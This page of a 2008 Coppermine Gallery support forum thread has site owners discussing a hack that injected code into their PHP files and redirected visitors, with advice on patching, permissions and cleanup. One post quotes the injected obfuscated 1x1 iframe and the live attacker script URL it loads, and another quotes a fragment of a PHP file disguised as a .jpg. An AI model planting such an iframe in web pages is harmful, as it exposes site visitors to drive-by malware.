Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 3 Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 3
 

News:

CPG Release 1.6.27
change DB IP storage fields to accommodate IPv6 addresses
remove use of E_STRICT (PHP 8.4 deprecated)
update README to reflect new website
align code with new .com CPG website
correct deprecation in captcha

Main Menu

Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

Started by htgguy, April 06, 2008, 10:04:11 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

Nibbler

Disable the URI uploads feature. Preferably disable all uploading from untrusted users until the new version is released.

mr.goose

Quote from: Tano*87 on April 09, 2008, 06:46:39 PM
OMG guys I get the same thing right yesterday. I've deleted the script code from all the PHP pages (which means that I've edited a very lot of page between coppermine and cutenews and I still haven't retoutchd the one from the forum yet) but it comes again today!!!! What I have to do?

Do like Nibbler says. Also you may want to do some research into security issues with CuteNews. Just because the Coppermine Devs have found an issue in Coppermine, it does not mean that your other web applications are safe. It would be a shame to patch your Coppermine and clean up all those files again, only to find you have been hacked again via CuteNews. For what its worth. I am undertaking a full security audit on all applications, on all my sites.
Best wishes, G.

Joachim Müller

Do as Nibbler suggested above. Stop shouting and panicking and observe this thread!

Joachim Müller

@Tano*87: do as Nibbler suggested above. Stop shouting and panicking and observe this thread!

@mr.goose: thanks for keeping a level head.

@Nibbler: thanks for taking care of this issue

@everyone else: do not send me (or anyone else) PMs that deal with this issue unless we explicitely ask for it. The next jerk who will send me an unwanted PM is in for a silencer (i.e. a temporary ban). I understand that you're exited about the situation, but it doesn't help to have another "me too" posting here or an invalid report without the needed details. I'm fed up with all the junk in my PM-inbox - don't waste my time nor the time of those who want to help.

>:( >:( >:( Joachim  >:( >:( >:(

NoAhBoDy

well I just got hosed by this at 13:07 CDT...

I wasn't going to post, but just to lighten things up a bit, here's a snippet of the code I found on my gallery (note...my injected file was a .jpg with php content and not .zip)
<?php 
[b]//sorry[/b]
function fileExtension($file) {
    
$fileExp explode('.'$file);
    
$filetype $fileExp[count($fileExp)-1];



heh...note the "//sorry" :P

NoAhBoDy

Quote from: Nibbler on April 09, 2008, 06:49:46 PM
Disable the URI uploads feature. Preferably disable all uploading from untrusted users until the new version is released.

maybe a stupid questoin, but where exactly do I do this??
Thanks

sharpo

Quote from: NoAhBoDy on April 09, 2008, 11:15:30 PM
maybe a stupid questoin, but where exactly do I do this??
Thanks
Look in the documentation, section 4.3 The group control panel. set the upload boxes to 0
Sharpo (not an expert, just a Coppermine user)
3 live galleries, first started in 2006.
http://www.sharpos-world.co.uk/BB3cpg/ with over 8,000 images.
http://www.sharpos-world.co.uk/cpg/ with over 25,000 images. 1.6.25
http://www.sharpos-world.co.uk/kc/ with over 300 images. 1.6.25

sharpo

I'm getting the feeling that somehow they can alter the upload box settings. Mine had all been changed to 0 but now one of them reads 10.

Have a look at this, the problems might be connected in some way?

http://forum.coppermine-gallery.net/index.php/topic,51716.0.html

(I'll apologise in advance for including this here, but I believe it's important!)
Sharpo (not an expert, just a Coppermine user)
3 live galleries, first started in 2006.
http://www.sharpos-world.co.uk/BB3cpg/ with over 8,000 images.
http://www.sharpos-world.co.uk/cpg/ with over 25,000 images. 1.6.25
http://www.sharpos-world.co.uk/kc/ with over 300 images. 1.6.25

mr.goose

Quote from: sharpo on April 10, 2008, 12:10:38 AM
I'm getting the feeling that somehow they can alter the upload box settings. Mine had all been changed to 0 but now one of them reads 10.

Have a look at this, the problems might be connected in some way?

http://forum.coppermine-gallery.net/index.php/topic,51716.0.html

  • (I'll apologise in advance for including this here, but I believe it's important!)
Certainly seems that the hackers can change (and|or affect) some of the Config settings, Sharpo. These Config settings were changed in my site:-

  • Path to custom header include albums = /userpics/10001/142739_298w3.zip (was blank)
  • Number of levels of categories to display = 1 (was 2)
  • Number of albums to display = 1 (was 50)
  • Number of columns for the album list = 1 (was 5)
  • Number of columns on thumbnail page = 1 (was 5)
  • Number of rows on thumbnail page = 1 (was 10)
  • Maximum number of tabs to display = 5 (was 25)

Looking at other hacked sites, it seems that some config setting must have been changed there too. I guess we just need to sit back and wait and see what the Dev Team comes back with. Meantime I've temporarily denied my webserver write access to the albums folder - since we can't upload anything at the moment anyway. At least if we are re-hacked in a similar manner, then the attacker will have no where to drop the zip file!  ;D



Best wishes, G

sharpo

Quote from: mr.goose on April 10, 2008, 12:42:04 AM
Certainly seems that the hackers can change (and|or affect) some of the Config settings, Sharpo. These Config settings were changed in my site:-

  • Path to custom header include albums = /userpics/10001/142739_298w3.zip (was blank)
  • Number of levels of categories to display = 1 (was 2)
  • Number of albums to display = 1 (was 50)
  • Number of columns for the album list = 1 (was 5)
  • Number of columns on thumbnail page = 1 (was 5)
  • Number of rows on thumbnail page = 1 (was 10)
  • Maximum number of tabs to display = 5 (was 25)

Looking at other hacked sites, it seems that some config setting must have been changed there too. I guess we just need to sit back and wait and see what the Dev Team comes back with. Meantime I've temporarily denied my webserver write access to the albums folder - since we can't upload anything at the moment anyway. At least if we are re-hacked in a similar manner, then the attacker will have no where to drop the zip file!  ;D



Best wishes, G
Just noticed I had a zip file to a custom header, that's a new one on me. Now deleted.

Have also chmod albums to 755

Thanks, Sharpo
Sharpo (not an expert, just a Coppermine user)
3 live galleries, first started in 2006.
http://www.sharpos-world.co.uk/BB3cpg/ with over 8,000 images.
http://www.sharpos-world.co.uk/cpg/ with over 25,000 images. 1.6.25
http://www.sharpos-world.co.uk/kc/ with over 300 images. 1.6.25

mr.goose

Quote from: sharpo on April 10, 2008, 01:08:28 AM
Just noticed I had a zip file to a custom header, that's a new one on me. Now deleted.

Have also chmod albums to 755

Thanks, Sharpo

Make sure you chown -Rv root.root /coppermine too!

If www-data (or whatever you webserver's account is called) still owns the files then it can write to them!
I actually set the directories to 755 and the files to 644, all owned by root. That way, the webserver can read the files, but cannot write to them. It also stops it creating new files and hence stops our hackers uploading any more nasty zip files! :D

Best wishes, G

mr.goose

BTW:-
I also opted for file permissions of 644 rather than 755 because that means the executable bit is not set. So hopefully that will prevent our attacker trying to run any disguised shell scripts etc we may have missed in the cleanup.
Best wishes, G

sharpo

Quote from: mr.goose on April 10, 2008, 01:36:29 AM
BTW:-
I also opted for file permissions of 644 rather than 755 because that means the executable bit is not set. So hopefully that will prevent our attacker trying to run any disguised shell scripts etc we may have missed in the cleanup.
Best wishes, G
I mistyped earlier, I had changed them to 644 not 755.

Another thing I noticed, I have a 4th gallery which I am still in the process of working on, about an hour ago a docs.php file was uploaded to the plugins folder - this I believe was similar to files that have been posted here earlier in the thread with the iframe line in the middle of the document.

I have since removed the plugins folder completely for that gallery (got a backup though)

That's it for tonight, had enough.
Sharpo (not an expert, just a Coppermine user)
3 live galleries, first started in 2006.
http://www.sharpos-world.co.uk/BB3cpg/ with over 8,000 images.
http://www.sharpos-world.co.uk/cpg/ with over 25,000 images. 1.6.25
http://www.sharpos-world.co.uk/kc/ with over 300 images. 1.6.25

marian

I've read thru this and am still unsure what to do. Unfortunately this is one of the rare nights our webmaster cannot be contacted.
We are not getting redirects to cdpuvbhfzzu but error messages. News indexes are, for example, showing Parse error: syntax error, unexpected '<' in /home/bymnews/public_html/news/classes/ProcessNews.class.php on line 248
Gallery looks normal here http://www.bymnews.com/photos/
but if you click on first item - America's Cup- it comes up with one thumbnail and latest additions vertically down page. http://www.bymnews.com/photos/index.php?cat=33
Can anyone give a step by step guide to what should be done?

mr.goose

Quote from: marian on April 10, 2008, 02:08:37 AM
I've read thru this and am still unsure what to do. Unfortunately this is one of the rare nights our webmaster cannot be contacted.
We are not getting redirects to cdpuvbhfzzu but error messages. News indexes are, for example, showing Parse error: syntax error, unexpected '<' in /home/bymnews/public_html/news/classes/ProcessNews.class.php on line 248
Gallery looks normal here http://www.bymnews.com/photos/
but if you click on first item - America's Cup- it comes up with one thumbnail and latest additions vertically down page. http://www.bymnews.com/photos/index.php?cat=33
Can anyone give a step by step guide to what should be done?

Sorry to tell you this but you have been hacked - several times by the look of it. View the page source on your main page and you'll see line after line pointing at the hackers server http://cdpuvbhfzz.com/dl/adv598.php in obfuscated code....

Quote<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>

Other problem is that it seems you are running quite an old version of Coppermine, version 1.4.5. Anyway, whether you remove the hack line by line from each and every infected file or you simply replace everything from a clean backup is up to you. Hopefully the Dev Team will have a patch pretty soon. But this is a sophisticated hack and I guess it may take a while to write the patch. End even with the patch, you'll still have to clean up the mess.



Best wishes, G.

marian

Quote from: mr.goose on April 10, 2008, 02:52:34 AM
Sorry to tell you this but you have been hacked - several times by the look of it. View the page source on your main page and you'll see line after line pointing at the hackers server http://cdpuvbhfzz.com/dl/adv598.php in obfuscated code....

Other problem is that it seems you are running quite an old version of Coppermine, version 1.4.5. Anyway, whether you remove the hack line by line from each and every infected file or you simply replace everything from a clean backup is up to you. Hopefully the Dev Team will have a patch pretty soon. But this is a sophisticated hack and I guess it may take a while to write the patch. End even with the patch, you'll still have to clean up the mess.



Best wishes, G.
Yes I know we have been hacked.
One thing I find very interesting is that when I was accessing our site on one of my laptops I got a Trend message saying I was being attacked by VIRUS XML HACK AQ. I could not read what Trend had done about it because the laptop planted and when I rebooted it came up with an unrecoverable system error.
So I went onto the Trend site and found it had no knowledge of XML HACK AQ that it had warned me about, nor any recognition of cdpuvbhfzz
We have phoned Trend Australia - northern hemisphere offices being closed - and they no nothing about this. Seems wierd to me.

mr.goose

Quote from: marian on April 10, 2008, 03:59:13 AM
Yes I know we have been hacked.
One thing I find very interesting is that when I was accessing our site on one of my laptops I got a Trend message saying I was being attacked by VIRUS XML HACK AQ. I could not read what Trend had done about it because the laptop planted and when I rebooted it came up with an unrecoverable system error.
So I went onto the Trend site and found it had no knowledge of XML HACK AQ that it had warned me about, nor any recognition of cdpuvbhfzz
We have phoned Trend Australia - northern hemisphere offices being closed - and they no nothing about this. Seems wierd to me.

Hmm nasty. I run Linux on all my PC's and have not been affected by looking at any of the affected sites (touch wood!). But I have been unable to de-obfuscate the javascript generated by adv598.php either, so I still have no idea what it contains - though it has the potential to be very nasty. Of course, if it is a virus, (and I say if) then any windows user looking at your site could be at risk. You might want to give Trend another call and point them to the hacker's server:- http://cdpuvbhfzz.com/dl/adv598.php and see what they make of the script? I would certainly be interested to know.
Best wishes, G

Llama8668

So is this definitely a Coppermine issue (and if so is it worth disabling it until a fix is found - having to reupload every PHP file for a site is soul destroying  :-[)?

I've been hit with the same attack (twice on one site, once on another). The code is replicated across all PHP files (which is a mess to clean up). The first time around it the coppermine gallery was 4.12 and the second it was 4.1.6.

It's resolved by re uploading all files again (and you need to add in some configuration changes as things like album and column are messed up). On each restored gallery though I get errors when attempting to batch add new files (which is why I came to the forum initially) which states Unable to create thumbnail or reduced size image.

Personally I was leaning towards the attacker coming in through either some of my custom php code or the cutenews cms script. If it helps here are some of the logs which were leading me to that belief (I'm not an expert it's just the frequent rapid calls to the scripts made me suspicious).

[09/04/2008 16:38:29] NOTICE:  Undefined variable:  template in line 42 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  show in line 43 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  POST in line 32 of file /DIRECTORY/STRUCTURE/cutenews/show_news.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  CN_HALT in line 67 of file /DIRECTORY/STRUCTURE/cutenews/show_news.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  static in line 67 of file /DIRECTORY/STRUCTURE/cutenews/show_news.php
[09/04/2008 16:38:29] NOTICE:  Undefined index:   in line 313 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  my_q in line 322 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  my_q in line 324 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined index:   in line 313 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  my_q in line 322 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  my_q in line 324 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  1 in line 14 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  2 in line 15 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  member_db_line in line 54 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  4 in line 56 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  7 in line 64 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  5 in line 64 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  2 in line 65 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php


[09/04/2008 16:12:12] WARNING:  main() [&lt;a href='function.include'&gt;function.include&lt;/a&gt;]: Failed opening '/DIRECTORY/STRUCTURE/Functions/Cache_End.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:15:52] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:15:52] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:15:52] WARNING:  main() [&lt;a href='function.include'&gt;function.include&lt;/a&gt;]: Failed opening '/DIRECTORY/STRUCTURE/Functions/Cache_End.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:19:56] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:19:56] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:19:56] WARNING:  main() [&lt;a href='function.include'&gt;function.include&lt;/a&gt;]: Failed opening '/DIRECTORY/STRUCTURE/Functions/Cache_End.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:22:07] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:22:07] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php

marian

Quote from: mr.goose on April 10, 2008, 04:24:06 AM
You might want to give Trend another call and point them to the hacker's server:- http://cdpuvbhfzz.com/dl/adv598.php and see what they make of the script? I would certainly be interested to know.
Best wishes, G
Phones engaged, voice mail on, but have emailed my direct contact with that info.

mr.goose

@ Llama8668:
There appears to be an issue with Coppermine. However that does not mean there isn't an issue with other PHP scripts as well. I guess we'll know more when the Coppermine Dev team comes back with a patch and its recommendations.

@ Marian:
I'm really interested to hear what Trend has to say. I'm as keen to find out what's behind this as I am to get a fix. However, it seems this is something relatively new so there may not be any quick answers.

Anyway, its 4 AM here in Old Blighty and I am going to hit the hay if you'll excuse me. I spent most of last night researching this too and I'm more than a little sleepy. Good night all.  :D


Best wishes, G